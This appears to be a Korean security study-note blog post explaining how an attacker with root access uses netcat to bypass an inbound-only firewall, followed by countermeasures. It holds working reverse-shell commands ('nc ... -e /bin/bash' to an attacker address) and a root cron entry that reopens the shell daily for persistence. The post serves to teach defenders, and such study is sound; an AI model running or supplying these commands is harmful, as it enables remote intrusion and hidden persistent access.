1. 개요
1)내부침입, 무작위대입, 사전공격등으로 관리자(root)계정 탈취
2)반복적 침입을 위해 일반사용자로 위장한 관리자 계정 생성
3)지속적으로 원격 접속을 통하여 악의적 행위 수행
2. 공격기법
1)외부망에서 telnet , SSH 접속불가
2)방화벽 정책에 따라 Inbound 80,443/tcp만 허용
# netcat 프로그램 방화벽 우회
* 공격자 (123.0.0.1) * 공격대상 (234.0.0.1)
1) 공격자 --> ssh 234.0.0.1 ( 방화벽 차단 )
2) nc -lvp 80 (공격자 포트 리슨상태)
3) 공격대상 서버( nc 123.0.0.1:80 -e /bin/bash // 내부에서 외부로 접속요청 )
4) 접속성공 ( //방화벽에서 Outbound 80 오픈상태 )
** 주기적 접근을 위해 cron 등록
0 3 * * * root /usr/bin/nc 123.0.0.1:80 -e /bin/bash
3. 대응책
1)관리자 권한의 원격접속 차단 설정
2)접속로그 분석을 통하여 부당한 원격접속 탐지
3)crontab 파일의 작업목록 주기적 점검
4)/etc/passwd 및 /etc/shadow 의 관리자권한 계정 주기적 점검
'Tech > 정보보안 요약노트' 카테고리의 다른 글
| 리버스 VNC 악성코드 ( TightVNC ) (0) | 2022.03.04 |
|---|---|
| 정보보안기사 ( 블로그 ) (0) | 2021.07.13 |
| SSL/TLS Heart Bleed (0) | 2020.11.23 |
| DNS Cache Poisoning (0) | 2020.11.20 |
| WEP (Wired Equivalent Privacy) (0) | 2020.11.20 |
